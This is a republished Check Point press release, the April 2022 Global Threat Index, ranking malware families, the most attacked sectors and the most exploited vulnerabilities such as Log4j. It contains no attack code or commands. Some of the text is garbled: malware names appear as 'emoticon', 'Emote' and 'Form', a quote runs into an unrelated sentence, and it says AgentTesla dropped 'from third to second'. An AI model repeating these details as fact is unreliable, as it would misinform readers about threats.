Home Sms code Most wanted malware of April 2022: a jolt in the index

Most wanted malware of April 2022: a jolt in the index


SAN CARLOS, Calif., May 11, 2022 (GLOBE NEWSWIRE) — Check Point Research (CPR), the threat intelligence arm of Check Point® Software Technologies Ltd. (NASDAQ:CHKP), one of the world’s leading cybersecurity solution providers, has released its latest Global Threat Index for April 2022. Researchers report that Emotet, an advanced, self-spreading and modular Trojan , is still the most prevalent malware, affecting 6% of organizations worldwide. Despite this, there has been movement for all other malware on the list. Tofsee and Nanocore came out and were replaced by Formbook and Lokibot, now the second and sixth most common malware respectively.

March’s higher Emotet score (10%) was mainly due to specific Easter-themed scams, but this month’s decrease could also be explained by Microsoft’s decision to disable specific related macros to Office files, affecting how Emotet is generally delivered. In fact, there are reports that Emotet has a new delivery method; using phishing emails containing a OneDrive URL. Emotet has many uses after successfully bypassing a machine’s protections. Due to its sophisticated spreading and assimilation techniques, Emotet also offers other malware to cybercriminals on dark web forums including banking trojans, ransomware, botnets, etc. delivered after the breach has been compromised.

Elsewhere in the index, Lokibot, an information stealer, re-entered the list in sixth place after a high-impact spam campaign spreading the malware via xlsx files designed to look like legitimate invoices. This, and the rise of Formbook, impacted the position of other malware with the AgentTesla advanced remote access (RAT) trojan, for example, dropping from third place to second place. .

At the end of March, critical vulnerabilities were discovered in Java Spring Framework, known as Spring4Shell, and since then many threat actors have exploited the threat to spread Mirai, the ninth most widespread malware this month. .

“With the ever-changing cyber threat landscape and with large corporations such as Microsoft influencing the parameters within which cybercriminals can operate, threat actors need to become more creative in how they distribute malware, as evidenced by the new delivery method currently used by Emotet,” said Maya Horowitz, Vice President of Research at Check Point. it is not yet in the top ten vulnerabilities list, it should be noted that more than 35% of organizations worldwide have already been affected by this threat in its first month alone, and therefore we expect that ‘She’s going up the list in the next few months.’

CPR also revealed this month that education and research continue to be the most targeted industry by cybercriminals worldwide. “Web Server Exposed Git Repository Information Disclosure” is the most exploited vulnerability, affecting 46% of organizations worldwide, closely followed by “Apache Log4j Remote Code Execution”. “Apache Struts ParametersInterceptor ClassLoader Security Bypass” soars in the index, now in third place with an overall impact of 45%.

Top Malware Families

*The arrows refer to the change in ranking compared to the previous month.

This month emoticon remains the most popular malware, affecting 6% of businesses worldwide, closely followed by Form which impacts 3% of organizations and AgentTesla with an overall impact of 2%.

  1. ↔ Emote – Emotet is an advanced, self-propagating and modular Trojan. Emotet was once used as a banking Trojan, but recently it is used as a distributor for other malware or malicious campaigns. It uses multiple methods to maintain persistence and evasion techniques to avoid detection. Also, it can spread through phishing spam emails that contains malicious attachments or links.
  2. ↑ Form – Formbook is an Infostealer targeting the Windows operating system and was first detected in 2016. It is marketed as Malware-as-a-Service (MaaS) in underground hacking forums for its hacking techniques. powerful escape and its relatively low price. FormBook collects credentials from various web browsers, collects screenshots, monitors and logs keystrokes, and can download and execute files based on commands from its C&C.
  3. AgentTesla – Agent Tesla is an advanced RAT functioning as a keylogger and information stealer, able to monitor and collect victim’s keyboard input, system keyboard, take screenshots and to exfiltrate credentials to a variety of software installed on the victim’s machine (including Google Chrome, Mozilla Firefox, and Microsoft Outlook.)

Main sectors attacked in the world

This month, education/research is the most attacked industry in the world, followed by government/military and Internet service providers and managed service providers (ISPs and MSPs).

  1. Education & Research
  2. Government and military
  3. Internet Service Providers and Managed Service Providers (ISPs and MSPs)

Main exploited vulnerabilities

This month “Disclosure of information about the Git repository exposed by the web server » is the most exploited vulnerability, affecting 46% of organizations worldwide, closely followed by “Apache Log4j Remote Code Execution” with an overall impact of 46%. “Apache StrutsInterceptor ClassLoader Parameter Security Bypassnow ranks third in the list of most exploited vulnerabilities, with an overall impact of 45%.

  1. ↑ Disclosure of information about the Git repository exposed by the web server– An information disclosure vulnerability has been reported in the Git repository. Successful exploitation of this vulnerability could allow inadvertent disclosure of account information.
  2. Apache Log4j Remote Code Execution (CVE-2021-44228)– A remote code execution vulnerability exists in Apache Log4j. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.
  3. Apache StrutsInterceptor ClassLoader Security Bypass setting (CVE-2014-0094,CVE-2014-0112,CVE-2014-0113,CVE-2014-0114)– A security bypass vulnerability exists in Apache Struts. The vulnerability is caused due to inadequate validation of data processed by ParametersInterceptor allowing manipulation of the ClassLoader. A remote attacker could exploit this vulnerability by providing a class parameter in a request.

Top Mobile Malware

This month AlienBot is the most prevalent mobile malware, followed by FluBot and xHelper.

  1. AlienBot – The AlienBot malware family is Malware-as-a-Service (MaaS) for Android devices that allows a remote attacker to first inject malicious code into legitimate financial applications. The attacker gains access to victims’ accounts and ultimately has complete control over their device.
  2. FluBot– FluBot is an Android malware distributed via phishing SMS (Smishing), most often impersonating logistics delivery brands. Once the user clicks on the link inside the message, they are redirected to download a bogus application containing FluBot. Once installed, the malware has various capabilities to collect credentials and support the Smishing operation itself, including downloading the contact list, as well as sending SMS messages to users. other phone numbers.
  3. xHelper – A malicious application seen in the wild since March 2019, used to download other malicious applications and display advertisements. The application is able to hide itself from the user and reinstall itself in case of uninstallation.

Check Point’s Global Threat Impact Index and its ThreatCloud Map are powered by Check Point’s ThreatCloud intelligence. ThreatCloud provides real-time threat intelligence derived from hundreds of millions of sensors around the world across networks, devices and mobiles. Intelligence is enhanced with AI-powered engines and proprietary research data from Check Point Research, the intelligence and research arm of Check Point Software Technologies.

The full list of the top ten malware families in April is available on Check Point’s blog.

Follow Check Point Research via:
Blog: https://research.checkpoint.com/
Twitter: https://twitter.com/_cpresearch_

About Check Point Research
Check Point Research provides cutting-edge cyber threat intelligence to Check Point Software customers and the wider intelligence community. The research team collects and analyzes global cyberattack data stored on ThreatCloud to keep hackers at bay, while ensuring that all Check Point products are updated with the latest protections. The research team consists of over 100 analysts and researchers cooperating with other security vendors, law enforcement and various CERTs.

About Check Point Software Technologies Ltd.
Check Point Software Technologies Ltd. (checkpoint.com) is a leading provider of cybersecurity solutions for businesses and governments worldwide. Check Point Infinity’s portfolio of solutions protects businesses and public organizations against 5th generation cyberattacks with an industry-leading capture rate of malware, ransomware and other threats. Infinity comprises three main pillars delivering uncompromising security and Generation V threat prevention in enterprise environments: Check Point Harmony, for remote users; Check Point CloudGuard, to automatically secure clouds; and Check Point Quantum, to protect network perimeters and data centers, all controlled by the industry’s most comprehensive and intuitive unified security management. Check Point protects more than 100,000 organizations of all sizes.

Emilie Beneitez Lefebvre Kip E. Meintzer
Check Point Software Technologies Check Point Software Technologies
[email protected] [email protected]